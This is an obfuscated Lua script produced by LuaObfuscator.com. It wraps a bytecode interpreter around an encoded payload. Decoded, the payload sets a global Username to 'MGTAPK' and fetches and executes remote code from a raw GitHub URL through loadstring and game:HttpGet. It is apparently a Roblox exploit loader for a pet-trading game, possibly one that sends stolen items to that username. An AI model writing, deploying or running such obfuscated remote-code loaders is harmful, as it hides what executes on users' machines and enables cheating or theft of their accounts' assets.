--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.1) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==1) then v21=function(v31,v32,v33)if v33 then local v76=(v31/(2^(v32-1)))%((2 + 0)^(((v33-(1888 -(210 + 1677))) -(v32-(204 -(58 + (1211 -(418 + 648)))))) + 1));return v76-(v76%(1 + 0));else local v77=0;local v78;while true do if (v77==(1402 -(867 + 535))) then v78=(458 -(282 + 174))^(v32-(1487 -(494 + 992)));return (((v31%(v78 + v78))>=v78) and (1 + 0)) or (0 + (0 -0));end end end end;v22=nil;v22=function()local v39=0 -(0 -0);local v40;while true do if (v39==(1 + 0)) then return v40;end if (v39==((0 -0) + 0)) then v40=v1(v16,v19,v19);v19=v19 + (1 -0);v39=1092 -(381 + 710);end end end;v23=nil;v18=2;end if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v41=748 -(35 + 713);local v42;local v43;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v41~=(532 -(47 + 481))) then else while true do if (v42==(921 -(36 + 884))) then local v100=0 -0;while true do if (v100~=(0 -0)) then else v45=nil;v46=nil;v100=1 + 0;end if (v100==1) then v42=2;break;end end end if (v42~=3) then else v49=nil;while true do local v104=0 -0;local v105;while true do if (v104~=(1001 -(555 + 446))) then else v105=0;while true do if (v105~=(2 -1)) then else if (v43~=(126 -(43 + 83))) then else local v133=0;local v134;while true do if (v133==0) then v134=0 -0;while true do if ((1 + 1)==v134) then v43=2 -1;break;end if (v134~=0) then else v44={};v45={};v134=1;end if ((1 -0)==v134) then local v147=0 -0;while true do if ((0 -0)==v147) then local v158=1388 -(1219 + 169);while true do if (v158==1) then v147=1;break;end if (v158~=(0 -0)) then else v46={};v47={v44,v45,nil,v46};v158=1 + 0;end end end if (1==v147) then v134=2;break;end end end end break;end end end break;end if (v105==(0 -0)) then local v118=0;while true do if (v118~=(0 + 0)) then else local v135=0;while true do if (v135~=(1 + 0)) then else v118=1;break;end if (v135==0) then if (v43~=1) then else local v148=0;local v149;while true do if (0==v148) then v149=0 + 0;while true do if (v149~=(0 + 0)) then else local v159=0 -0;while true do if (v159==(2 -1)) then v149=1;break;end if (v159~=(874 -(594 + 280))) then else v48=v24();v49={};v159=552 -(44 + 507);end end end if (v149~=1) then else local v160=552 -(462 + 90);while true do if (v160~=(0 + 0)) then else for v166=1,v48 do local v167=0;local v168;local v169;local v170;local v171;local v172;while true do if (2==v167) then v172=nil;while true do if (v168~=(662 -(650 + 11))) then else local v176=0;while true do if (v176==(0 -0)) then v171=nil;v172=nil;v176=1;end if (v176==(1 + 0)) then v168=7 -5;break;end end end if ((488 -(138 + 350))~=v168) then else v169=0;v170=nil;v168=1;end if (v168~=2) then else while true do if (v169~=1) then else v172=nil;while true do if (v170==(2 -1)) then if (v171==(2 -1)) then v172=v22()~=0;elseif (v171==(2 + 0)) then v172=v25();elseif (v171==3) then v172=v26();end v49[v166]=v172;break;end if (v170==(0 -0)) then local v180=0 + 0;while true do if (v180==(1 + 0)) then v170=1 -0;break;end if ((0 -0)==v180) then local v188=0;while true do if (v188~=0) then else v171=v22();v172=nil;v188=1;end if (v188~=(499 -(115 + 383))) then else v180=1;break;end end end end end end break;end if ((240 -(53 + 187))==v169) then v170=0;v171=nil;v169=1;end end break;end end break;end if (v167~=(462 -(72 + 389))) then else v170=nil;v171=nil;v167=2;end if (v167==0) then v168=0;v169=nil;v167=1541 -(219 + 1321);end end end v47[3]=v22();v160=1 + 0;end if (v160==(1 + 0)) then v149=1 + 1;break;end end end if (v149~=(3 -1)) then else v43=2;break;end end break;end end end if (v43==(641 -(635 + 4))) then local v150=0 + 0;local v151;local v152;while true do if ((0 -0)==v150) then v151=0 + 0;v152=nil;v150=1;end if (v150==1) then while true do if (v151==(191 -(92 + 99))) then v152=0 -0;while true do local v161=0;local v162;while true do if (v161==0) then v162=1230 -(722 + 508);while true do if (v162==0) then if ((1539 -(122 + 1416))==v152) then local v173=0;while true do if (v173~=(0 + 0)) then else for v177=1,v24() do v46[v177]=v24();end return v47;end end end if (v152~=(0 + 0)) then else local v174=0;local v175;while true do if ((0 -0)~=v174) then else v175=0;while true do if (v175==(0 + 0)) then for v181=1 + 0,v24() do local v182=0;local v183;local v184;local v185;while true do if (v182==(0 -0)) then v183=1231 -(941 + 290);v184=nil;v182=1 + 0;end if (v182==(1 + 0)) then v185=nil;while true do if (v183~=(1 + 0)) then else while true do if (v184==0) then v185=v22();if (v21(v185,1,1)==0) then local v191=0;local v192;local v193;local v194;local v195;while true do if (v191==0) then local v196=0;while true do if (v196==1) then v191=1;break;end if (0==v196) then v192=0;v193=nil;v196=394 -(277 + 116);end end end if (1==v191) then local v197=0;while true do if (v197~=0) then else v194=nil;v195=nil;v197=1 -0;end if (v197==1) then v191=2 + 0;break;end end end if (v191==(2 + 0)) then while true do if (v192==2) then local v198=0 + 0;local v199;while true do if (v198==0) then v199=0;while true do if ((1362 -(973 + 389))==v199) then if (v21(v194,3 -2,1)==1) then v195[2]=v49[v195[2]];end if (v21(v194,2 -0,1382 -(896 + 484))==(448 -(193 + 254))) then v195[5 -2]=v49[v195[3]];end v199=1;end if (v199==1) then v192=10 -7;break;end end break;end end end if (v192==0) then local v200=0;while true do if (v200~=(1 + 0)) then else v192=1069 -(32 + 1036);break;end if (v200~=(0 -0)) then else v193=v21(v185,2 + 0,3);v194=v21(v185,1215 -(690 + 521),902 -(692 + 204));v200=1;end end end if (1==v192) then local v201=603 -(133 + 470);while true do if (v201==(1986 -(929 + 1057))) then v195={v23(),v23(),nil,nil};if (v193==(0 -0)) then local v205=0;while true do if (0==v205) then v195[3]=v23();v195[13 -9]=v23();break;end end elseif (v193==(1 -0)) then v195[3]=v24();elseif (v193==2) then v195[3]=v24() -(2^16);elseif (v193~=(2 + 1)) then else local v214=1054 -(919 + 135);local v215;local v216;while true do if (v214==0) then v215=0;v216=nil;v214=1;end if (v214~=(1 -0)) then else while true do if (v215==(389 -(290 + 99))) then v216=0 + 0;while true do if (0~=v216) then else v195[3]=v24() -(2^(720 -(88 + 616)));v195[1784 -(644 + 1136)]=v23();break;end end break;end end break;end end end v201=1;end if (v201==1) then v192=1269 -(658 + 609);break;end end end if (v192==(3 + 0)) then if (v21(v194,3,3)==(440 -(83 + 356))) then v195[4]=v49[v195[4]];end v44[v181]=v195;break;end end break;end end end break;end end break;end if (v183==0) then local v189=0 + 0;while true do if (v189==(0 -0)) then local v190=0 + 0;while true do if (v190==(517 -(227 + 290))) then v184=1978 -(537 + 1441);v185=nil;v190=2 -1;end if ((1 + 0)==v190) then v189=1 -0;break;end end end if (v189==1) then v183=1136 -(252 + 883);break;end end end end break;end end end for v186=1,v24() do v45[v186-(1 -0)]=v29();end v175=1;end if (v175==(159 -(34 + 124))) then v152=1 -0;break;end end break;end end end break;end end break;end end end break;end end break;end end end v135=1;end end end if (v118~=(1 -0)) then else v105=4 -3;break;end end end end break;end end end break;end if (v42==(1131 -(111 + 1018))) then v47=nil;v48=nil;v42=2 + 1;end if (v42==(0 -0)) then local v101=0 + 0;local v102;while true do if (v101~=0) then else v102=0;while true do if (v102==0) then v43=1700 -(168 + 1532);v44=nil;v102=1;end if (v102~=(1 + 0)) then else v42=1;break;end end break;end end end end break;end if (v41~=3) then else v48=nil;v49=nil;v41=4;end if ((1517 -(1194 + 321))~=v41) then else v46=nil;v47=nil;v41=3;end if (1==v41) then v44=nil;v45=nil;v41=2;end if (v41~=(0 -0)) then else v42=0 -0;v43=nil;v41=1 + 0;end end end;v18=5;end if (v18==3) then v25=function()local v50=0 + 0;local v51;local v52;local v53;local v54;local v55;local v56;while true do if (v50==(1 + 0)) then v53=1;v54=(v21(v52,(2 -1) + 0,(57 -45) + 8) * ((2 + 0)^(24 + 8))) + v51;v50=1488 -(532 + 954);end if (v50==0) then v51=v24();v52=v24();v50=15 -(11 + 3);end if (v50==((1935 -(919 + 1015)) + 2)) then if (v55==(839 -(177 + 662))) then if (v54==(550 -(70 + 480))) then return v56 * 0;else v55=1 + 0 + 0;v53=(1063 -(646 + 417)) + 0;end elseif (v55==(3221 -(92 + 1082))) then return ((v54==(0 -0)) and (v56 * ((1 + 0)/(0 -0)))) or (v56 * NaN);end return v8(v56,v55-(2133 -(429 + 681))) * (v53 + (v54/((6 -4)^(48 + 4))));end if (2==v50) then v55=v21(v52,10 + 11,69 -38);v56=((v21(v52,31 + 1)==(1 -(0 -0))) and  -((3 + 0) -(1 + 1))) or (1 + 0);v50=7 -(3 + 1);end end end;v26=nil;v26=function(v34)local v57;if  not v34 then local v79=0;while true do if (v79==(0 -0)) then v34=v24();if (v34==(0 + 0)) then return "";end break;end end end v57=v3(v16,v19,(v19 + v34) -(2 -1));v19=v19 + v34;local v58={};for v69=1, #v57 do v58[v69]=v2(v1(v3(v57,v69,v69)));end return v6(v58);end;v27=v24;v18=4;end if (v18==2) then v23=function()local v59=0 + 0;local v60;local v61;while true do if (v59==(184 -(111 + (169 -96)))) then v60,v61=v1(v16,v19,v19 + 1 + 1);v19=v19 + (3 -1);v59=1;end if (v59==(1 + (0 -0))) then return (v61 * (44 + 212)) + v60;end end end;v24=nil;v24=function()local v62,v63,v64,v65=v1(v16,v19,v19 + 3 + 0);v19=v19 + 1 + 3;return (v65 * 16777216) + (v64 * (66552 -(478 + 538))) + (v63 * 256) + v62;end;v25=nil;v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v35)if (v1(v35,2)==79) then local v80=0;while true do if (v80==0) then v20=v0(v3(v35,1,1));return "";end end else local v81=v2(v0(v35,16));if v20 then local v95=v5(v81,v20);v20=nil;return v95;else return v81;end end end);v21=nil;v18=1;end if (v18==5) then v30=nil;v30=function(v36,v37,v38)local v66=v36[1];local v67=v36[2];local v68=v36[3];return function(...)local v71=1;local v72= -1;local v73={...};local v74=v12("#",...) -1;local function v75()local v82=v66;local v83=v67;local v84=v68;local v85=v28;local v86={};local v87={};local v88={};for v92=1473 -(714 + 759),v74 do if (((4844 -(327 + 158))>(1333 + 416)) and (v92>=v84)) then v86[v92-v84]=v73[v92 + 1];else v88[v92]=v73[v92 + (134 -(118 + 15))];end end local v89=(v74-v84) + (1438 -(838 + 599));local v90;local v91;while true do local v93=(1349 -(64 + 1285)) -0;while true do if ((1111<(2344 -(617 + 9))) and ((1 + 0)==v93)) then if (((3431 -(382 + 946))==2103) and (v91<=4)) then if ((v91<=1) or (1499<785)) then if ((v91>(0 + 0)) or ((4757 -(113 + 116))>(2285 + 2670))) then do return;end else local v108=0 + 0;local v109;local v110;local v111;while true do if (((160 + 95)<(4543 -(777 + 70))) and ((1 + 0)==v108)) then v111=nil;while true do if (((6462 -3969)==(3938 -(579 + 866))) and (v109==(1630 -(1090 + 461 + 79)))) then local v136=998 -(969 + 29);while true do if (((6874 -(2218 + 641))>=(5312 -(25 + (3385 -1728)))) and (v136==((0 -0) + 0))) then v110=v90[1 + 1];v111=v88[v90[1375 -(1142 + (391 -161))]];v136=1 + 0 + 0;end if ((v136==(1 + 0)) or ((16851 -12961)==(2182 -625))) then v109=1687 -(453 + 1233);break;end end end if (((6201 -3531)>=(1395 -(511 + 111))) and (v109==(1 + 0))) then v88[v110 + 1]=v111;v88[v110]=v111[v90[4]];break;end end break;end if ((v108==(0 -0)) or ((3023 -(1210 + 1))<=601)) then v109=0;v110=nil;v108=(2 -1) + 0;end end end elseif ((390>=((980 + 391) -1063)) and (v91<=(3 -1))) then for v119=v90[4 -2],v90[6 -3] do v88[v119]=nil;end elseif ((4656>=3036) and (v91>3)) then v88[v90[1 + 1 + 0]]=v90[3 + 0];else v88[v90[5 -3]]();end elseif ((946<=(4320 -1823)) and (v91<=(123 -(48 + 68)))) then if ((v91<=5) or (1691==(4009 + 189))) then if ((v88[v90[4 -2]]==v90[1391 -(14 + 281 + (2744 -(1649 + 3)))]) or ((263 + 2184)>(2813 + 1455))) then v71=v71 + 1;else v71=v90[3];end elseif ((v91>(2 + 4)) or ((187 + 1864)==(5795 -(472 + 626)))) then v71=v90[4 -1];else v88[v90[321 -(35 + 284)]]=v38[v90[2 + 1]];end elseif (((2753 + 551)>=642) and (v91<=(4 + 4))) then local v112=733 -(63 + 670);local v113;local v114;local v115;local v116;local v117;while true do if ((2643==(3574 -931)) and (v112==(1 + (506 -(303 + 203))))) then v115=nil;v116=nil;v112=1 + 1;end if ((3880>(1977 -(1451 + 299))) and (v112==(375 -(362 + 11)))) then v117=nil;while true do if ((v113==((5836 -4130) -(1153 + 370 + 183))) or ((19766 -14927)<173)) then local v140=127 -((441 -(329 + 33)) + 48);while true do if ((v140==(1535 -(38 + 1497))) or (((1904 -(354 + 745)) + 634)>(1469 + 421))) then v114=v90[4 -2];v115,v116=v85(v88[v114](v13(v88,v114 + 1,v90[3 + 0])));v140=2 -1;end if ((((6423 -3188) -(150 + 1140))>=26) and (v140==(55 -(37 + 17)))) then v113=147 -(52 + 94);break;end end end if (((5747 -(110 + 1252))>(1356 + 1550)) and (v113==(255 -(205 + 49)))) then local v141=(127 + 293) -(386 + 34);while true do if ((v141==((83 + 266) -(14 + 334))) or ((1670 + 1435)<=(344 + 563))) then v113=477 -(448 + 27);break;end if (((2222 + 1735)==3957) and (v141==(0 -0))) then v72=(v116 + v114) -1;v117=0 -0;v141=453 -(299 + 153);end end end if (((230 + (2669 -(1303 + 29)))<3411) and (v113==(2 -0))) then for v142=v114,v72 do local v143=0 -0;local v144;local v145;while true do if ((v143==(3 -2)) or ((2631 + 2172)<(401 -188))) then while true do if ((v144==(0 + 0)) or (((3026 + 1305) -(762 + 401))<(1498 -(151 + 189)))) then v145=209 -(207 + 2);while true do if (((8754 -5218)>(1802 + 510)) and (v145==(1779 -(1643 + 136)))) then v117=v117 + 1 + 0;v88[v142]=v115[v117];break;end end break;end end break;end if ((v143==(0 + 0)) or ((4693 -1284)<=((10349 -(30 + 1491)) -5768))) then v144=(430 + 1179) -(1186 + 423);v145=nil;v143=3 -2;end end end break;end end break;end if ((v112==(0 -0)) or ((1833 + (2349 -647))<=(4633 -2940))) then v113=643 -(524 + 119);v114=nil;v112=(2572 -1744) -(497 + 330);end end elseif ((v91==(937 -(323 + 605))) or ((7408 -4033)>(2457 + 938))) then local v127=0 + 0;local v128;local v129;local v130;while true do if (((2690 -1953)<(5010 -(903 + 899))) and (v127==0)) then v128=0 -0;v129=nil;v127=835 -(405 + 429);end if (((1378 -(657 + 422 + 215))<(409 + 1718 + 83 + 12)) and (v127==((889 -(776 + 111)) -1))) then v130=nil;while true do if ((v128==0) or ((3194 -2115)<(187 -112))) then local v146=0;while true do if (((793 -(48 + 15))==730) and (v146==1)) then v128=(1806 -(429 + 1376)) + 0;break;end if ((3239>(6121 -4046)) and (v146==((3823 -(577 + 1364)) -(756 + 1126)))) then v129=0;v130=nil;v146=1153 -(925 + 6 + 221);end end end if (((12009 -7867)>=(2228 -1145)) and (v128==(1 + 0))) then while true do if (((2542 -1295)==(1052 + 195)) and (v129==0)) then v130=v90[1602 -(982 + 618)];v88[v130]=v88[v130](v13(v88,v130 + (1 -0),v72));break;end end break;end end break;end end else v88[v90[1 + 1 + 0]][v90[1 + 2]]=v90[8 -4];end v71=v71 + 1;break;end if ((v93==(0 + 0 + 0)) or ((1850 -643)>(4091 -(334 + 809)))) then local v103=(1659 -(1648 + 11)) -0;while true do if (((3969 -2406)<=(1714 + 1154)) and (v103==(1393 -(1233 + 160)))) then v90=v82[v71];v91=v90[1];v103=1 -0;end if ((v103==(1 + 0)) or ((4692 -((1332 -931) + 1535))<=2614)) then v93=1 + 0;break;end end end end end end A,B=v28(v11(v75));if  not A[1] then local v94=v36[4][v71] or "?";error("Script error at ["   .. v94   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end;return v30(v29(),{},v17)(...);end end end v15("LOL!083O00028O0003023O005F4703083O00557365726E616D6503063O004D475441504B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F526973686965732F7073782F6D61696E2F70737873637269707400153O0012043O00014O0002000100013O0026053O0002000100010004073O00020001001204000100013O00260500010005000100010004073O00050001001206000200023O00300A000200030004001206000200053O001206000300063O00202O000300030007001204000500084O0008000300054O000900023O00022O00030002000100010004073O001400010004073O000500010004073O001400010004073O000200012O00013O00017O00153O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
